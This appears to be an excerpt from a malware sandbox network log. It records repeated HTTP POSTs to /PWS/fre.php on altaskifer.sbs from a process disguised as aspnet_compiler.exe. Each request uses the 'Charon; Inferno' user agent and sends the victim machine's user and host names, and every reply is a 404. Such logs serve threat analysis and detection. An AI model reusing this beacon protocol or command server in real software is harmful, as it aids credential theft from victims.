                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32FYP0NzF%2BSRTmsxJ9ZcUXuF4uIGAblzg4OwZ85L6Foz1lHYScaGbhEMDue3m2tuswaYlVocp0vSltcjMLSln1k7jK2eHuCxvbKYEOsqN21dPl9JDxMYyT8lD0SmM9L8YQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011fffa3ea524-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                46192.168.2.649771172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:03.603579044 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:03.727606058 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:04.092643023 CEST611INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:04 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FnbBAHyLkNOa5aqaydUam3%2FqYL0RVYkIE%2FT%2FZ0HaPYUW40HU%2BVe714USuW2KmOxUR9lDD6xMkWn2z4%2BdZR51G%2FRyH72EcElJYtI7%2FiTT9nZffFNmQzDLg0fgMzZz6UX7ZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001204ed882888-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                47192.168.2.649772172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:04.359603882 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:04.484122038 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:04.861344099 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:04 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L615XcJZzDjYWsDyeEgRwPSvL6Y%2BbVMflTcRRU55lDMYRlGtceuRXOyPNKwqBoq1ABo6ysrPk%2FhkOevMZQepszfbz%2BD%2FCPJnufiUbDCuzzUjy341%2BYDOACi8N8rIVJ%2BDFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001209ac917439-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                48192.168.2.649773172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:05.124910116 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:05.251928091 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:05.618626118 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lYUfNWE9jn77%2FHjF8X385rySiz22PqC%2B72Je0N5%2Bh6MIFlNgB3xuG2cY2fpFicqrlnVyp5o08nOuUVBwlzhROfeDeFMZYqUDjEEgLLdvxi5xZYMA%2B4xct1nP2ZHTvvjXHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700120e6d3c129b-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                49192.168.2.649774172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:05.891669989 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:06.015583992 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:06.400134087 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NimoAg5%2FXiHvIjDn36mo3FbjFSaCQZylxerow2D5WawNSqHV7aZGE%2BCax38sidzkjrJIHIt6KjSzLr1nw4pC8XSqIdASTD%2BodHDg1hM%2Bm5BTQS35XeY0wHpHCVjiSEe5Ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012133c096daa-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                50192.168.2.649775172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:06.739588022 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:06.863511086 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:07.233756065 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:07 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HuBs%2BMAjusuFC9hlOM%2FgdevH1WY7J6eKDwKg%2Fr2VOcnLZFXqjQWjnwMpGYtoeCkYbHfrI6Ixp%2Bfs4X6VGbKni%2BmBpbacA8q9Wj4XVC94rLep8DtiTE0n91WKBRYeChyswQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012188ee331dd-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                51192.168.2.649776172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:08.980640888 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:09.105062008 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:09.486944914 CEST599INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:09 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2sCxI5p9GUnTa7ie2%2FFTUAgDnK5qhWBtsKRKsw040rsUoCMIptGdjfRVSeTRxy78sWigCOzaTAZMaMftGRWKhSmLRTMqjsuGqZCx9eeIZ61PEogv%2FeOksjNnvdnrrW8RYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700122689be5c6a-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                52192.168.2.649777172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:09.757970095 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:09.882371902 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:10.268945932 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:10 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AOQjZT72Pgr7tI4uRS3BFLOwEu%2FeI5%2Bzid0AXoCaoSvWNkweeNCTYDPl1IXDe%2FqJlHDBK2ZrFQvZC2g1GJrH%2FIX9vVxZlHzCMVUsO3ZPssSO8gGFIeNRkJ8Q5wFJ%2FSTLhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700122b68d331d7-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                53192.168.2.649778172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:10.531873941 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:10.655966997 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:11.039398909 CEST609INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:10 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VWOb5u%2FtWkgAotx%2F0Xnp9PKkOXFlDwfDZhkLBy8R8E7hHrMunwr%2F3CPdwdEcgHnvZphyECKCx4bNcIAqhHYjH2pgU%2FSxwplYKYF4Jd%2BfbxLgyKvBJspwLsDmkRi%2F%2BZDjWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700123038cd8758-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                54192.168.2.649780172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:11.314148903 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:11.438782930 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:11.828299999 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mytn67HKjgDtNSnsaZOdNxbAUD%2FU5TFPPqbO3EcBztzTVx6ENviHDwUw8O5MHOO%2FYw2F0d7dqa8%2F0bVWWh2CmKq8GyGn2ykc3itT0NkElCAn620jVM8xzhAbdGICIvW2Lw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012351d1d5c63-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                55192.168.2.649781172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:12.096910954 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:12.221122026 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:12.595292091 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:12 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A8Z%2Bjw9qnFhRS5obRmBFjKkAROo3NIH35VEDQmwujDqmgFnsx8H2DUaYEYw8p5HCyFygpRnQFd3%2BQHcl8741itJtbB3lxiLhgAwMHtbPzoiI1yz%2FY6dzbdxD3NpXnZRT0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001239fe0f0a1a-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                56192.168.2.649782172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:12.861150980 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:12.985090017 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:13.376586914 CEST599INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:13 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfweIPOFJwhX9ErS8cZ1UEfcKRp7YDs9K%2BoWEaRUHfCQxx%2BzcayEHeEy9WKZKrgoRQQV1y0AaTc5yg7uaTjCpljdl8B0I57gmTrDL6NsFsXCdNhIAjkLzEkPzxOPPjTPkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700123eca7325be-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                57192.168.2.649784172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:13.652600050 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:13.776787043 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:14.150090933 CEST613INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:14 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LZYuTJcuhe0PhyTk8GdhASc8gDIQ%2F8c3%2Bk3w4cwhroM2oIPxwE7%2BGbY00I8e3%2B2Kg7TpTYkr6GtInb%2F3%2F60OOC2BuEm0pCj1w84dSpkSu1ecpDhuRYgsGj7%2Fl%2BizFI%2B7tA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001243b88c2248-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                58192.168.2.649785172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:14.423119068 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:14.548338890 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:14.937064886 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:14 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oEzP9xn%2FY5kau4iQsTH9PXGrlSAw0f5WCdPdPmulAqU0c4TWV16AA5ubpMqdFN5zvLmyaJDzLWM979U715FzdfaCCFAK%2B5ky%2BfqCsLQaSSA501yhiwz5NAj1ANa5GedmtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012488ab1a4d3-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                59192.168.2.649786172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:15.205071926 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:15.329281092 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:15.706084967 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:15 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
